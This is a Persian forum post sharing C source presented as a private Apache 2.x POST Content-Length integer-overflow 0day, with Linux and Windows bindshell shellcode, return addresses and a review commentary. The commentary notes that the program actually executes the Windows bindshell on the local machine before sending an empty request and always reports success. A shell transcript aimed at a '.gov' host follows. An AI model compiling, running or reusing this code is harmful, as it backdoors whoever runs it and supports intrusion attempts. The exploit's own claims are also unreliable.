به زبان C است:
توضیحات :
کد:
/* [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!] [!Division by Infinity!] presents , , /\ /\ /( )\ /( /\ )\ _\ \_/ /_ \ \_/ / , /\ , |\_||_/| < \_ _/ > /_ _\ /| || |\ \______/ \|0 0|/ | \> </ | |\_||_/| _\/_ _(_ ^ _)_ (_ ^ _) \____/ ( () ) /`\|V"""V|/`\ /`\|IIIII|/`\ _\/_ {} \ \_____/ / \ \_____/ / () () /\ )=( /\ /\ )=( /\ () {} / \_/\=/\_/ \ / `-.\=/.-' \ () Apache <= 2.x POST Content-Length integer overflow !0DAY! by Mindphuck/[!DBI!] This is fsck1n pr1v8, r3l34z3 d1z t0 th3 wh1th8 c0mmUn1ty 4nd w3 w1ll t34r y0ur fuqin h34d 0v!1! [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!] */

/*
 * NOTE(review): what this file actually does, as read from the code below.
 *
 *  - ConstructBuffer() casts scode2 (the "win32 bindshell" literal) to a
 *    function pointer and runs it in a new thread on the machine that runs
 *    this program, then blocks in WaitForSingleObject() until that thread
 *    returns. This happens for every target index, before WSAStartup() and
 *    before any socket exists. The embedded payload is therefore executed
 *    locally by whoever compiles and runs the file.
 *  - The request main() sends afterwards carries an empty body: sc[0] is
 *    zeroed by memset() and never written (the NOP loop starts at index 4),
 *    so the "%s" in sprintf() expands to "". Nothing is ever read back from
 *    the server, and "Exploit successfull" is printed on any nonzero send()
 *    return value.
 *  - The buffer arithmetic in SetHellcode()/ConstructBuffer() writes far past
 *    the heap allocations it makes (details at each function).
 *  - The shell transcript further down the page (./Apache_0day with -v/-p
 *    options, credited to a different author) does not correspond to this
 *    source; this program's own usage text is "lulz.exe <Target> <Port>
 *    <Details>".
 *
 * The file builds only against Windows/Winsock (<windows.h>, SOCKET, WSADATA,
 * CreateThread). strlen/strcpy/memset/strncpy are used without an explicit
 * <string.h>; the build relies on it arriving transitively — TODO confirm.
 */

// Fixed compile bugs for GCC compiller, untested... KOrUPt.
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

//linux bindshell on port 4444
// Never executed by this program; it is only copied into `hellcode` when
// TG > 5 and from there into `sc`.
const char* scode1 =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x30"
"\x2c\xd6\x7f\x83\xeb\xfc\xe2\xf4\x01\xf7\x85\x3c\x63\x46\xd4\x15"
"\x56\x74\x4f\xf6\xd1\xe1\x56\xe9\x73\x7e\xb0\x17\x21\x70\xb0\x2c"
"\xb9\xcd\xbc\x19\x68\x7c\x87\x29\xb9\xcd\x1b\xff\x80\x4a\x07\x9c"
"\xfd\xac\x84\x2d\x66\x6f\x5f\x9e\x80\x4a\x1b\xff\xa3\x46\xd4\x26"
"\x80\x13\x1b\xff\x79\x55\x2f\xcf\x3b\x7e\xbe\x50\x1f\x5f\xbe\x17"
"\x1f\x4e\xbf\x11\xb9\xcf\x84\x2c\xb9\xcd\x1b\xff";

//win32 bindshell on port 4444
// This literal is what ConstructBuffer() executes on the local host via
// CreateThread(), regardless of the selected target.
const char* scode2 =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa0"
"\xa7\x83\x65\x83\xeb\xfc\xe2\xf4\x5c\xcd\x68\x28\x48\x5e\x7c\x9a"
"\x5f\xc7\x08\x09\x84\x83\x08\x20\x9c\x2c\xff\x60\xd8\xa6\x6c\xee"
"\xef\xbf\x08\x3a\x80\xa6\x68\x2c\x2b\x93\x08\x64\x4e\x96\x43\xfc"
"\x0c\x23\x43\x11\xa7\x66\x49\x68\xa1\x65\x68\x91\x9b\xf3\xa7\x4d"
"\xd5\x42\x08\x3a\x84\xa6\x68\x03\x2b\xab\xc8\xee\xff\xbb\x82\x8e"
"\xa3\x8b\x08\xec\xcc\x83\x9f\x04\x63\x96\x58\x01\x2b\xe4\xb3\xee"
"\xe0\xab\x08\x15\xbc\x0a\x08\x25\xa8\xf9\xeb\xeb\xee\xa9\x6f\x35"
"\x5f\x71\xe5\x36\xc6\xcf\xb0\x57\xc8\xd0\xf0\x57\xff\xf3\x7c\xb5"
"\xc8\x6c\x6e\x99\x9b\xf7\x7c\xb3\xff\x2e\x66\x03\x21\x4a\x8b\x67"
"\xf5\xcd\x81\x9a\x70\xcf\x5a\x6c\x55\x0a\xd4\x9a\x76\xf4\xd0\x36"
"\xf3\xf4\xc0\x36\xe3\xf4\x7c\xb5\xc6\xcf\x92\x39\xc6\xf4\x0a\x84"
"\x35\xcf\x27\x7f\xd0\x60\xd4\x9a\x76\xcd\x93\x34\xf5\x58\x53\x0d"
"\x04\x0a\xad\x8c\xf7\x58\x55\x36\xf5\x58\x53\x0d\x45\xee\x05\x2c"
"\xf7\x58\x55\x35\xf4\xf3\xd6\x9a\x70\x34\xeb\x82\xd9\x61\xfa\x32"
"\x5f\x71\xd6\x9a\x70\xc1\xe9\x01\xc6\xcf\xe0\x08\x29\x42\xe9\x35"
"\xf9\x8e\x4f\xec\x47\xcd\xc7\xec\x42\x96\x43\x96\x0a\x59\xc1\x48"
"\x5e\xe5\xaf\xf6\x2d\xdd\xbb\xce\x0b\x0c\xeb\x17\x5e\x14\x95\x9a"
"\xd5\xe3\x7c\xb3\xfb\xf0\xd1\x34\xf1\xf6\xe9\x64\xf1\xf6\xd6\x34"
"\x5f\x77\xeb\xc8\x79\xa2\x4d\x36\x5f\x71\xe9\x9a\x5f\x90\x7c\xb5"
"\x2b\xf0\x7f\xe6\x64\xc3\x7c\xb3\xf2\x58\x53\x0d\x50\x2d\x87\x3a"
"\xf3\x58\x55\x9a\x70\xa7\x83\x65";

// Globals filled by ConstructBuffer()/SetHellcode() and freed at the end of
// main(). `sc` is the request body, `hellcode` a heap copy of one literal.
char* sc = NULL;
char* hellcode = NULL;

// One row per selectable target: a label for Usage() and a 4-byte value that
// ConstructBuffer() copies into sc[1024..1027].
struct Target { char* Ident; char* RetAddr; };

// Initialised with brace elision: the flat list pairs up as {Ident, RetAddr}.
// Index 0..5 are the Windows rows, 6..7 the Linux rows (see SetHellcode).
struct Target TR[8] = {
 "Windows XP 5.1.0.0 SP0 (IA32)", "\x1c\x80\xf5\x77", // jmp *%esp @ ntdll.dll
 "Windows NT 4.0.6.0 SP6 (IA32)", "\x63\xD4\xF9\x77", // jmp *%esp @ ntdll.dll
 "Windows 2000 5.0.1.0 SP1 (IA32)", "\xAB\x67\xF9\xFF", // jmp *%esp @ ntdll.dll
 "Windows 2003 Server 5.2.0.0 SP0 (IA32)", "\xAB\x8B\xFB\x77", // jmp *%esp @ ntdll.dll
 "Windows 2003 Server 5.2.1.0 SP1 (IA32)", "\xD3\xFE\x86\x7C", // jmp *%esp @ ntdll.dll
 "Windows XP 5.1.2.0 SP2 (IA32)", "\xED\x1E\x94\x7C", // jmp *%esp @ ntdll.dll
 "Linux 2.4.x Kernel", "\x25\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1
 "Linux 2.6.x Kernel", "\x77\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1
};

/*
 * Copy the literal for target index TG into the global `hellcode`.
 * TG > 5 selects scode1, anything else scode2.
 *
 * Defects visible here:
 *  - malloc(strlen(x)) reserves no room for the terminating NUL that
 *    strcpy() writes: a one-byte heap overflow on every call.
 *  - The malloc() result is not checked before memset()/strcpy().
 *  - memset() of a buffer that strcpy() then fully overwrites is redundant.
 *  - strlen() on a byte literal stops at the first 0x00 byte, so the copied
 *    length is whatever precedes such a byte, not the literal's full length.
 */
void SetHellcode(int TG) {
 if(TG > 5) // linux
 {
  hellcode = (char*)malloc(strlen(scode1));
  memset(hellcode,0,strlen(scode1));
  strcpy(hellcode,scode1);
 }
 else // windows
 {
  hellcode = (char*)malloc(strlen(scode2));
  memset(hellcode,0,strlen(scode2));
  strcpy(hellcode,scode2);
 }
}

/*
 * Build the global `sc` for target index TG, then run scode2 locally.
 *
 * Buffer arithmetic: `sc` is allocated with only strlen(hellcode) bytes,
 * yet the loops store to sc[4..1023], sc[1024..1027] and sc[1028..]; all of
 * those indices lie beyond the allocation (heap corruption inside this
 * program). memset() zeroes sc[0..strlen-1] and nothing later writes sc[0],
 * so as a C string `sc` is empty — main()'s "%s" prints nothing of it.
 * strncpy() with n == strlen(hellcode) writes no terminator either.
 *
 * Local execution: `f` is scode2 reinterpreted as a function; CreateThread()
 * starts it on this host and WaitForSingleObject() blocks until it returns.
 * The CreateThread() handle is not checked (a NULL handle would be passed to
 * WaitForSingleObject()). Whether the thread actually runs depends on the
 * literal's memory being executable on the host — cannot be determined here.
 */
void ConstructBuffer(int TG) {
 int i;
 SetHellcode(TG);
 sc = (char*)malloc(strlen(hellcode));   // far too small for the writes below
 memset(sc,0,strlen(hellcode));
 for(i = 4; i < 1024; i++) sc[i] = 0x90; // NOP-sled
 for(i = 0; i < 4; i++) sc[i+1024] = TR[TG].RetAddr[i];
 strncpy(sc+1028,hellcode,strlen(hellcode)); // shellcode
 int (*f)() = (int(*)())scode2;          // scode2, not hellcode, and not TG-dependent
 DWORD dwThread;
 HANDLE th = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)f, NULL, 0, &dwThread);
 WaitForSingleObject(th, INFINITE);     // blocks until the payload thread exits
}

/*
 * Print the command-line help and the TR[] index list, then exit(1).
 * Called from main() when fewer than three arguments are given.
 */
void Usage() {
 int x = 0;
 printf("Usage: lulz.exe <Target> <Port> <Details>\n");
 printf("[*]Detail list: \n");
 for(x = 0; x < 8; x++) printf("[%d]%s\n",x,TR[x].Ident);
 printf("\nExample: lulz.exe localhost 80 1\n");
 exit(1);
}

/*
 * Entry point: argv[1] host, argv[2] port, argv[3] TR[] index.
 *
 * Order of operations matters: ConstructBuffer(x) — and with it the local
 * CreateThread() of scode2 — runs before WSAStartup(), before name
 * resolution and before any socket is created.
 *
 * Other points visible in the body:
 *  - `p2` is declared and never used.
 *  - atoi() results are unchecked; iPort silently truncates to 16 bits. The
 *    0..7 range check on x is what keeps TR[x] in bounds.
 *  - The request's first line ends in "\n" while the remaining headers use
 *    "\r\n". Content-Length claims 0x7FFFFFFF but exactly 2048 bytes are
 *    sent, mostly the zero padding left by memset(buffer,0,2048), because
 *    "%s" of `sc` yields "" (see ConstructBuffer).
 *  - On Winsock, SOCKET is an unsigned type, so `s < 0` is never true; the
 *    failure value to compare against is INVALID_SOCKET.
 *  - send() returns the byte count on success and SOCKET_ERROR (-1) on
 *    failure; both are nonzero, so the "[-]Send error" branch is effectively
 *    unreachable and the success banner is printed either way. No response
 *    is ever read from the peer.
 *  - Error paths exit() without closesocket()/WSACleanup(); process exit
 *    reclaims them.
 */
int main(int argc, char *argv[]) {
 SOCKET s;
 struct sockaddr_in sin;
 struct hostent *he;
 char buffer[2048];
 char *p2;                 // unused
 int x = 0;
 unsigned short iPort = 80;
 WSADATA wsa_prov;
 printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
 printf("[!Priv8 Apache <= 2.x Exploit!]\r\n");
 printf("[! by Mindphuck/[!DBI!] !]\r\n");
 printf("[! Apache <= 2.x POST Content-Length integer overflow!]\r\n");
 printf("[! Leads to remote code execution !]\r\n");
 printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
 if(argc < 4) Usage();
 iPort = atoi(argv[2]);
 x = atoi(argv[3]);
 if(x < 0 || x > 7) { printf("[-]Invalid Details ...\n"); exit(1); }
 printf("[*]Attacking %s:%d running %s...\n",argv[1],iPort,TR[x].Ident);
 ConstructBuffer(x);       // runs scode2 locally before any network activity
 if (WSAStartup(0x0101, &wsa_prov)) { perror("[-]WSAStartup error"); exit(1); }
 he = gethostbyname(argv[1]);
 if (!he) { perror("gethostbyname"); exit(1); }
 sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
 memset(buffer,0,2048);
 // Unbounded sprintf(); only safe here because `sc` formats as "" (sc[0]==0).
 sprintf(buffer,"POST /index.php HTTP/1.0\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s\r\n",0x7FFFFFFF,sc);
 s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (s < 0) { perror("[-]Socket error..."); exit(1); }   // never true for an unsigned SOCKET
 sin.sin_family = AF_INET;
 sin.sin_port = htons(iPort);
 if (connect(s, (const struct sockaddr*)&sin, sizeof(struct sockaddr_in))) { perror("[-]Connection error..."); exit(1); }
 // send() == 0 only if nothing was sent; -1 (error) also takes the "success" branch.
 if(send(s, buffer, 2048, 0)) printf("[+]Exploit successfull, shellcode executed ...\n[+]h4rzh4rz, t4rg3t pWn3d!1!11!\n");
 else printf("[-]Send error...\n");
 closesocket(s);
 WSACleanup();
 if(hellcode) free(hellcode);
 if(sc) free(sc);
 exit(0);
}
کد:
pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day
pi3-darkstar ~ # ./Apache_0day -h
...::: -=[ Apache 2.2.xx 0day exploit (by Adam 'pi3' Zabrocki) ]=- :::...
Usage: ./Apache_0day <options>
Options:
-v <victim>
-p <port>
-h this help screen
pi3-darkstar ~ # ./Apache_0day -v xxx.gov